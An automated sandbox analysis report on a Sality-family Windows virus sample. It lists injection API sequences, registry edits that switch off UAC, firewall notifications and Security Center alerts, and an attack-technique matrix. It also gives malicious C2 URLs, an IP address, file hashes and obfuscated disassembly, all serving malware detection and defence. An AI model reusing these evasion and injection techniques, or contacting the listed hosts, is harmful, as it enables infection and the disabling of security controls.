        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02211EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpi,lstrcmpi,lstrcmpi,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree,0_2_02211EF6
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_00401346 free,GetCurrentProcess,CloseHandle,GetThreadContext,GetThreadSelectorEntry,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,LdrInitializeThunk,ReadProcessMemory,ReadProcessMemory,0_2_00401346

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02211EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpi,lstrcmpi,lstrcmpi,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree,0_2_02211EF6
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
        Source: fontdrvhost.exe, 00000002.00000000.308024108.000001A855140000.00000002.00000001.00040000.00000000.sdmp, fontdrvhost.exe, 00000002.00000002.569834851.000001A855140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: fontdrvhost.exe, 00000002.00000000.308024108.000001A855140000.00000002.00000001.00040000.00000000.sdmp, fontdrvhost.exe, 00000002.00000002.569834851.000001A855140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
        Source: fontdrvhost.exe, 00000002.00000000.308024108.000001A855140000.00000002.00000001.00040000.00000000.sdmp, fontdrvhost.exe, 00000002.00000002.569834851.000001A855140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: fontdrvhost.exe, 00000002.00000000.308024108.000001A855140000.00000002.00000001.00040000.00000000.sdmp, fontdrvhost.exe, 00000002.00000002.569834851.000001A855140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_0220E329 MultiByteToWideChar,RtlEnterCriticalSection,GetLocalTime,GetFileAttributesA,SetFileAttributesA,CreateFileA,GetFileSize,GetFileTime,LdrInitializeThunk,CreateFileMappingA,MapViewOfFile,lstrcpyn,lstrcmpi,GlobalAlloc,IsBadHugeWritePtr,LdrInitializeThunk,IsBadHugeWritePtr,LdrInitializeThunk,IsBadHugeWritePtr,LdrInitializeThunk,IsBadHugeWritePtr,LdrInitializeThunk,IsBadHugeWritePtr,LdrInitializeThunk,IsBadHugeWritePtr,LdrInitializeThunk,IsBadHugeWritePtr,LdrInitializeThunk,IsBadHugeWritePtr,IsBadHugeWritePtr,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,GetTickCount,LdrInitializeThunk,GlobalAlloc,UnmapViewOfFile,FindCloseChangeNotification,SetFilePointer,SetEndOfFile,WriteFile,GlobalFree,SetFileTime,FindCloseChangeNotification,SetFileAttributesA,DeleteFileA,GlobalFree,RtlLeaveCriticalSection,Sleep,0_2_0220E329
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02211EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpi,lstrcmpi,lstrcmpi,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree,0_2_02211EF6
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02213B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,LdrInitializeThunk,LdrInitializeThunk,RegSetValueExA,RegCloseKey,RegOpenKeyExA,LdrInitializeThunk,LdrInitializeThunk,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,LdrInitializeThunk,LdrInitializeThunk,RegSetValueExA,LdrInitializeThunk,LdrInitializeThunk,RegSetValueExA,LdrInitializeThunk,LdrInitializeThunk,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,LdrInitializeThunk,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,LdrInitializeThunk,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,0_2_02213B60

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotificationsJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_02207A3A htons,socket,LdrInitializeThunk,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread,0_2_02207A3A
        Source: C:\Users\user\Desktop\lzxbD4wR0g.exeCode function: 0_2_022083C9 socket,htons,bind,listen,accept,CreateThread,closesocket,RtlExitUserThread,0_2_022083C9
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Replication Through Removable Media
        1
        Native API
        1
        Windows Service
        1
        Bypass User Access Control
        5
        Disable or Modify Tools
        1
        Credential API Hooking
        1
        System Time Discovery
        1
        Replication Through Removable Media
        1
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        Inhibit System Recovery
        Default Accounts2
        Command and Scripting Interpreter
        Boot or Logon Initialization Scripts1
        Access Token Manipulation
        2
        Obfuscated Files or Information
        LSASS Memory1
        Peripheral Device Discovery
        Remote Desktop Protocol1
        Credential API Hooking
        Exfiltration Over Bluetooth1
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        Windows Service
        4
        Software Packing
        Security Account Manager1
        Account Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Non-Standard Port
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)312
        Process Injection
        1
        Bypass User Access Control
        NTDS3
        File and Directory Discovery
        Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        File Deletion
        LSA Secrets3
        System Information Discovery
        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading
        Cached Domain Credentials1
        Security Software Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem3
        Process Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
        Process Injection
        /etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 724697 Sample: lzxbD4wR0g.exe Startdate: 17/10/2022 Architecture: WINDOWS Score: 100 21 Multi AV Scanner detection for domain / URL 2->21 23 Malicious sample detected (through community Yara rule) 2->23 25 Antivirus detection for URL or domain 2->25 27 8 other signatures 2->27 6 lzxbD4wR0g.exe 48 2 2->6         started        process3 dnsIp4 19 85.85.85.85, 5517 EUSKALTELES Spain 6->19 17 C:\Users\user\AppData\Local\Temp\xnpkup.exe, PE32 6->17 dropped 29 Changes security center settings (notifications, updates, antivirus, firewall) 6->29 31 Contains functionality to inject threads in other processes 6->31 33 Disables user account control notifications 6->33 35 5 other signatures 6->35 11 WerFault.exe 6->11         started        13 explorer.exe 6->13         started        15 fontdrvhost.exe 6->15 injected file5 signatures6 process7

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        lzxbD4wR0g.exe78%VirustotalBrowse
        lzxbD4wR0g.exe100%ReversingLabsWin32.Virus.Sality
        lzxbD4wR0g.exe100%AviraW32/Sality.AT
        lzxbD4wR0g.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\xnpkup.exe100%AviraW32/Sality.AT
        C:\Users\user\AppData\Local\Temp\xnpkup.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLinkDownload
        0.2.lzxbD4wR0g.exe.400000.0.unpack100%AviraTR/Injector.2461429Download File
        0.2.lzxbD4wR0g.exe.21e26b0.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        0.2.lzxbD4wR0g.exe.21d0d88.6.unpack100%AviraHEUR/AGEN.1230764Download File
        0.2.lzxbD4wR0g.exe.2200cc4.10.unpack100%AviraTR/Killav.ftkDownload File
        0.2.lzxbD4wR0g.exe.21e0000.9.unpack100%AviraTR/Rootkit.Gen2Download File
        0.2.lzxbD4wR0g.exe.4fc564.2.unpack100%AviraHEUR/AGEN.1230764Download File
        0.2.lzxbD4wR0g.exe.544c50.4.unpack100%AviraTR/Patched.Ren.GenDownload File
        0.2.lzxbD4wR0g.exe.429a02.1.unpack100%AviraTR/Patched.Ren.GenDownload File
        0.0.lzxbD4wR0g.exe.400000.0.unpack100%AviraW32/Sality.ATDownload File
        0.2.lzxbD4wR0g.exe.6034ec.5.unpack100%AviraHEUR/AGEN.1230764Download File
        0.3.lzxbD4wR0g.exe.4dc55c.0.unpack100%AviraHEUR/AGEN.1230764Download File
        0.3.lzxbD4wR0g.exe.51ce4c.1.unpack100%AviraHEUR/AGEN.1230764Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://kukutrustnet987.info/home.gif15%VirustotalBrowse
        http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif0%Avira URL Cloudsafe
        http://paaaaad.fd.fd/sobakavolos.gif0%Avira URL Cloudsafe
        http://kukutrustnet987.info/home.gif100%Avira URL Cloudmalware
        http://89.119.67.154/testo5/0%Avira URL Cloudsafe
        http://www.klkjwre9fqwieluoi.info/100%Avira URL Cloudmalware
        http://kukutrustnet777888.info/100%Avira URL Cloudmalware
        http://89.110%Avira URL Cloudsafe
        http://kukutrustnet888.info/home.gif100%Avira URL Cloudmalware
        http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers100%Avira URL Cloudmalware
        http://padrup.com.ds/sobaka1.gifhttp://paaaaad.fd.fd/sobakavolos.gifs0%Avira URL Cloudsafe
        http://kukutrustnet777.info/home.gif100%Avira URL Cloudmalware
        http://padrup.com.ds/sobaka1.gif0%Avira URL Cloudsafe
        http://kukutrustnet777888.info/DisableTaskMgrSoftware100%Avira URL Cloudmalware
        http://padrup.com.ds/sobaka1.gifhttp://paaaaad.fd.fd/sobakavolos.gif0%Avira URL Cloudsafe

        Download Network PCAP: filteredfull

        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.giflzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://padrup.com.ds/sobaka1.gifhttp://paaaaad.fd.fd/sobakavolos.gifslzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://kukutrustnet987.info/home.giflzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmptrue
        • 15%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdriverslzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://89.11lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        http://kukutrustnet888.info/home.giflzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.klkjwre9fqwieluoi.info/lzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://kukutrustnet777888.info/lzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://paaaaad.fd.fd/sobakavolos.giflzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://89.119.67.154/testo5/lzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://kukutrustnet777.info/home.giflzxbD4wR0g.exe, 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://padrup.com.ds/sobaka1.giflzxbD4wR0g.exe, lzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmp, lzxbD4wR0g.exe, 00000000.00000002.315850733.0000000000603000.00000004.10000000.00040000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://padrup.com.ds/sobaka1.gifhttp://paaaaad.fd.fd/sobakavolos.giflzxbD4wR0g.exe, 00000000.00000002.316911438.00000000021C9000.00000004.00000010.00020000.00000000.sdmp, lzxbD4wR0g.exe, 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://kukutrustnet777888.info/DisableTaskMgrSoftwarelzxbD4wR0g.exe, 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        85.85.85.85
        unknownSpain
        12338EUSKALTELESfalse
        Joe Sandbox Version:36.0.0 Rainbow Opal
        Analysis ID:724697
        Start date and time:2022-10-17 18:24:36 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 7m 21s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:lzxbD4wR0g.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:1
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.spre.evad.winEXE@5/2@0/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 56.8% (good quality ratio 51%)
        • Quality average: 71%
        • Quality standard deviation: 33.4%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 46
        • Number of non-executed functions: 50
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
        • Not all processes where analyzed, report is missing behavior information
        TimeTypeDescription
        18:25:35API Interceptor5x Sleep call for process: lzxbD4wR0g.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        85.85.85.85uSVglLsrLr.exeGet hashmaliciousBrowse
          55l6Q8D1gM.exeGet hashmaliciousBrowse
            ca08wGck0d.exeGet hashmaliciousBrowse
              f9Gqm21D8k.exeGet hashmaliciousBrowse
                0K3843bRA2.exeGet hashmaliciousBrowse
                  iwV2wYLBqJ.exeGet hashmaliciousBrowse
                    vrhiyc.exeGet hashmaliciousBrowse
                      ucrcdh.exeGet hashmaliciousBrowse
                        lrbwh.exeGet hashmaliciousBrowse
                          ST6UNST.EXEGet hashmaliciousBrowse
                            MrBwjWzvyi.exeGet hashmaliciousBrowse
                              qdnle.exeGet hashmaliciousBrowse
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                EUSKALTELESuSVglLsrLr.exeGet hashmaliciousBrowse
                                • 85.85.85.85
                                55l6Q8D1gM.exeGet hashmaliciousBrowse
                                • 85.85.85.85
                                ca08wGck0d.exeGet hashmaliciousBrowse
                                • 85.85.85.85
                                f9Gqm21D8k.exeGet hashmaliciousBrowse
                                • 85.85.85.85
                                0K3843bRA2.exeGet hashmaliciousBrowse
                                • 85.85.85.85
                                3HpBXQ2vup.elfGet hashmaliciousBrowse
                                • 85.84.200.47
                                Euskotren_v2.8.6_apkgk.com.apkGet hashmaliciousBrowse
                                • 212.142.142.207
                                Euskotren_v2.8.6_apkgk.com.apkGet hashmaliciousBrowse
                                • 212.142.142.207
                                notabotnet.arm.elfGet hashmaliciousBrowse
                                • 188.93.77.109
                                EW2VNaHDDi.elfGet hashmaliciousBrowse
                                • 85.86.250.98
                                gh4en1xAoQ.elfGet hashmaliciousBrowse
                                • 83.213.83.152
                                YOQOfwoGob.elfGet hashmaliciousBrowse
                                • 37.218.91.147
                                go9qYoY9kgGet hashmaliciousBrowse
                                • 83.213.158.147
                                skid.arm-20220820-1521Get hashmaliciousBrowse
                                • 85.84.230.109
                                3dO4zEiA96Get hashmaliciousBrowse
                                • 83.213.158.131
                                Q0ckwyWEJ4Get hashmaliciousBrowse
                                • 212.142.207.103
                                87W4z6rKEUGet hashmaliciousBrowse
                                • 83.213.158.134
                                a8eclWvc6iGet hashmaliciousBrowse
                                • 83.213.158.150
                                yHXdbnUZNzGet hashmaliciousBrowse
                                • 85.84.200.55
                                PkxPgPbi8GGet hashmaliciousBrowse
                                • 85.85.85.38
                                No context
                                No context
                                Process:C:\Users\user\Desktop\lzxbD4wR0g.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):66561
                                Entropy (8bit):7.976654329567318
                                Encrypted:false
                                SSDEEP:1536:5MkiMeRlLvoiOgdq/rbHRQX/RFTJ8ynLaE2kRNM3qz+V:KSeR9wJTbHGJFt8gThRe3h
                                MD5:AA4E8176CD815494ED9320F0418EEDF6
                                SHA1:D777EB79D5537A8D62C4F017AF8BB9CF4EF9F32E
                                SHA-256:0E66C70971E1CD2DAAF606E09224911767E93CC3B68965227DB98ADF88C1115A
                                SHA-512:3A251DE3503209313AB1E026BAE770FCBB459EE3176F2C868CC42EE934C72D72E65BB220973EE16E125DD6B6085E819CA970259E753A575BF62BA645222CF7F0
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................=. ................................................................Y.n..~.....W......E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\lzxbD4wR0g.exe
                                File Type:Windows SYSTEM.INI
                                Category:dropped
                                Size (bytes):255
                                Entropy (8bit):5.277111699273008
                                Encrypted:false
                                SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPva:F4Yv7yk3OUBq82wqFtPva
                                MD5:7120D3CA73B6C3E11650060E0EF1AF22
                                SHA1:90896F3F0B849B90CA7061CDD108E58C4EC670FE
                                SHA-256:20DAD6FBDD212A76C32D264654102F642D83CF37CAFD7D629E4154464731BD2B
                                SHA-512:86FA4117BBAABD0316C901E51907613BA2F7CD80BED6DD73C55779781235F94A33C180D907C05628DDA4929669B1E8BAC13793314C1567B6A83015CD8865B413
                                Malicious:false
                                Reputation:low
                                Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=59814062956..
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.906729863419647
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.83%
                                • Windows Screen Saver (13104/52) 0.13%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:lzxbD4wR0g.exe
                                File size:2111255
                                MD5:c890f96e19ee27909df744b788477006
                                SHA1:3561aaad032a7a8697763f05247b4ae80c2aaf56
                                SHA256:2d0e058a8b228d5218137814147c05674d5c5ad8d0614f80cd088dba156204e2
                                SHA512:4f7b7fe68d6add3301b326748c325c1587dc57eca15df340613e47cea4d09172527a24a9c9f4ffac9df0ac23dc315904f1c77363527cd96bbd2ed4089e5c044c
                                SSDEEP:49152:kER9bTChxKCnFnQXBbrtgb/iQvu0UHOa5b:kK96hxvWbrtUTrUHOg
                                TLSH:F7A5CD152390CD22F25FD07256D45E7870B3A4292B33DCD3AA4895311BF1EEBEBB158A
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........[....................J.......................................Rich............PE..L...c{TO...................................
                                Icon Hash:00828e8e8686b000
                                Entrypoint:0x40167f
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:
                                Time Stamp:0x4F547B63 [Mon Mar 5 08:37:55 2012 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:730073214094cd328547bf1f72289752
                                Instruction
                                test al, 00000016h
                                mov cl, cl
                                lea ebp, dword ptr [1218237Bh]
                                test edi, 55D1CD1Bh
                                jne 00007F3980C25F85h
                                imul ebp, edi
                                cmp eax, ebx
                                mov eax, D46B27DBh
                                cmp dl, FFFFFFBEh
                                cmp edi, edi
                                call 00007F3980C25F85h
                                pop eax
                                neg ebx
                                neg bl
                                neg ebp
                                add edi, 000023C7h
                                add edi, 0000094Ah
                                movd mm3, eax
                                mov bl, dh
                                jmp 00007F3980C25F8Fh
                                imul edx, ebp, 1B9E426Ah
                                sub eax, ecx
                                cmp ah, al
                                movzx edx, bl
                                cmp ecx, edx
                                cmp esi, ebp
                                mov dl, ah
                                mov edi, FFFADC1Ah
                                xor edi, 00006B9Fh
                                mov ebx, edx
                                add edi, 0005487Bh
                                test edx, eax
                                dec ecx
                                movsx eax, bx
                                mov edx, FFFF4E63h
                                xor edx, 000010E0h
                                bswap eax
                                xor edx, 0000A07Bh
                                mov eax, 5A5AB014h
                                xadd edi, edx
                                sbb esi, A31FD8BFh
                                add edi, 00000109h
                                mov bh, 25h
                                cmp edi, 00000467h
                                jc 00007F3980C25F4Ah
                                movd ebp, mm3
                                jc 00007F3980C25F84h
                                not cl
                                test bh, dl
                                add ebp, 000230DEh
                                lea edi, dword ptr [C93D486Ah]
                                add ebp, 00000D3Ah
                                xchg dh, ah
                                sbb edx, edx
                                movsx ecx, al
                                xchg ah, dl
                                jne 00007F3980C25F88h
                                cmp eax, 000000D8h
                                Programming Language:
